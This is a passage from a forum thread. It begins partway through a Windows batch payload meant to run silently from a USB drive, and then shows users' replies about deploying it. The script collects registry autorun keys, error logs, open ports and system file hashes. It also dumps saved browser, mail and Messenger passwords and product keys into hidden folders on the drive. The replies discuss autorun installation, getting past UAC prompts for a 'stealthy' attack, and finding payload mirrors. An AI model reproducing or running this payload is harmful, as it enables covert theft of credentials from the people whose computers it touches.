+----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO + [startup Run RunOnce] + >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt REM Export the Run and RunOnce Values inside HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Run %1\logs\%computername%\HKLMrun.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Runonce %1\logs\%computername%\HKLMrunonce.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run %1\logs\%computername%\HKCUrun.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce %1\logs\%computername%\HKCUrunonce.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\sysinfo-%computername%.txt goto ERRORLOG :ERRORLOG ECHO +---------------------------------------+ >> %1\logs\%computername%\syslog-%computername%.txt ECHO + [system Error Log] +>> %1\logs\%computername%\syslog-%computername%.txt ECHO +---------------------------------------+ >> %1\logs\%computername%\syslog-%computername%.txt ECHO. >> %1\logs\%computername%\syslog-%computername%.txt ECHO This will only work in Windows Vista/XP >> %1\logs\%computername%\syslog-%computername%.txt ECHO. >> %1\logs\%computername%\syslog-%computername%.txt REM Grab Sytem Error Log for Review (Error ONLY) cscript %WINDIR%\System32\eventquery.vbs /fi "Type eq Error" /V /L System >> %1\logs\%computername%\syslog-%computername%.txt REM Grab Application Error Logs for Review cscript %WINDIR%\System32\eventquery.vbs /fi "Type eq Error" /V /L Application >> %1\logs\%computername%\syslog-%computername%.txt goto PORT :PORT ECHO +----------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt ECHO + [Port Scan] + >> %1\logs\%computername%\netlog-info-%computername%.txt ECHO +----------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\netlog-info-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt START .\portqry -local -l %1\logs\%computername%\netlog-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\netlog-info-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt goto MD5 :MD5 ECHO +----------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt ECHO + [MD5 Hashes of the system directory] +>> %1\logs\%computername%\osmd5-%computername%.txt ECHO +----------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\osmd5-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt echo %date% %time% >> %1\logs\%computername%\osmd5-%computername%.txt md5sums %systemroot% >> %1\logs\%computername%\osmd5-%computername%.txt md5sums %systemroot%\system >> %1\logs\%computername%\osmd5-%computername%.txt md5sums %systemroot%\system32 >> %1\logs\%computername%\osmd5-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\osmd5-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\osmd5-%computername%.txt goto MDINFO :MDINFO IF NOT EXIST %1\logs\%computername%\userinfo ( MD %1\logs\%computername%\userinfo\ ) goto MDPASS :MDPASS IF NOT EXIST %1\logs\%computername%\userinfo\pass ( MD %1\logs\%computername%\userinfo\pass\ ) goto IEFIREHIST :IEFIREHIST :INFO ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO + [information Recovery] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\urllog-%computername%.txt ECHO + [Dumping IE and FireFox history] +>> %1\logs\%computername%\userinfo\urllog-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\urllog-%computername%.txt START .\FirePassword.exe >> %1\logs\%computername%\userinfo\pass\firepass-%computername%.txt START cscript .\IE_FireFox.vbs >> %1\logs\%computername%\userinfo\firehistorylog-%computername%.txt START .\iehv.exe /stext %1\logs\%computername%\userinfo\IElog-%computername%.txt ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO Passwords stored in .\pass\firepass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO Passwords stored in .\pass\firehistorylog-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO Passwords stored in .\pass\IElog-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO + [Dump Mail PW] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO Passwords stored in .\pass\mailpass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt START .\mailpv.exe /stext "%1\logs\%computername%\userinfo\pass\mailpass-%computername%.txt" /sort "Application" /sort "Name" ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO + [Dump IE PW] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO Passwords stored in .\pass\IEpass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt START .\iepv.exe /stext "%1\logs\%computername%\userinfo\pass\IEpass-%computername%.txt" /sort "Entry Name" ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO + [Dump Messanger PW] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO Passwords will be dumped in .\pass\MSpass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt START .\mspass.exe /stext %1\logs\%computername%\userinfo\pass\MSpass-%computername%.txt ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO + [Dump Product Keys] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt START .\PRODUKEY.exe /nosavereg /stext "%1\logs\%computername%\userinfo\productkeys-%computername%.txt" /remote %computername% >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO + [Dumping Chrome Passwords] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO Passwords stored in .\pass\chromepass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt START .\ChromePass.exe /stext %1\logs\%computername%\userinfo\pass\chromepass-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt goto END :END ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt ECHO [Time Completed: %date% %time%] >> %1\logs\%computername%\info.txt ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt START EXPLORER.EXE exit i jus downloaded the Ghostpad... how do i install(sorry if i annoy you with my newbie questions) Quote Link to comment Share on other sites More sharing options...
Tox1k Posted March 20, 2012 Share Posted March 20, 2012 Lol don't use my payload, I never finished it. Use someone like Gonzor's, just look at the topics within the thread. As for mounting it, you'll need to put an autorun.inf file in it that runs start.bat, (google), and then either follow this tut or download this which has instructions and all the tools you need included.[/url] Quote Link to comment Share on other sites More sharing options...
kira Posted June 7, 2012 Share Posted June 7, 2012 Hello all :) ive got a really BIG problem when attempting to use this 'stealthy' attack.... On windows 7 I get ALOT of UAC, meaning even when admin, it asks whether i would like to let this program make changes to the computer. It does somewhat defeat the point :P it works fine on XP, though. Is it meant to do this? Im most likely doing something wrong if it inst meant to show the 7 displays of UAC :P thankyou for reading :) Quote Link to comment Share on other sites More sharing options...
Ethan Hunt Posted August 30, 2012 Share Posted August 30, 2012 Massive, perhaps pointless, bump on this topic, but do you guys have the payloads archived somewhere? I'm looking for both the U3 and Non-U3 versions. Played with this ages ago, and something interested me in this again, but I lost my backups like 4 years ago :) So if anyone could upload them somewhere I would be very grateful! Thanks! Quote Link to comment Share on other sites More sharing options...
lmgonza Posted September 13, 2012 Share Posted September 13, 2012 Well if anyone can send me to a payload like the first one id be appreciated thanks! Quote Link to comment Share on other sites More sharing options...
toruguen42 Posted January 29, 2013 Share Posted January 29, 2013 All mirrors are down??.. any word or work on setting up a new mirror? used to have the tool till my AV killed my copy..... put the wrong drive in. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.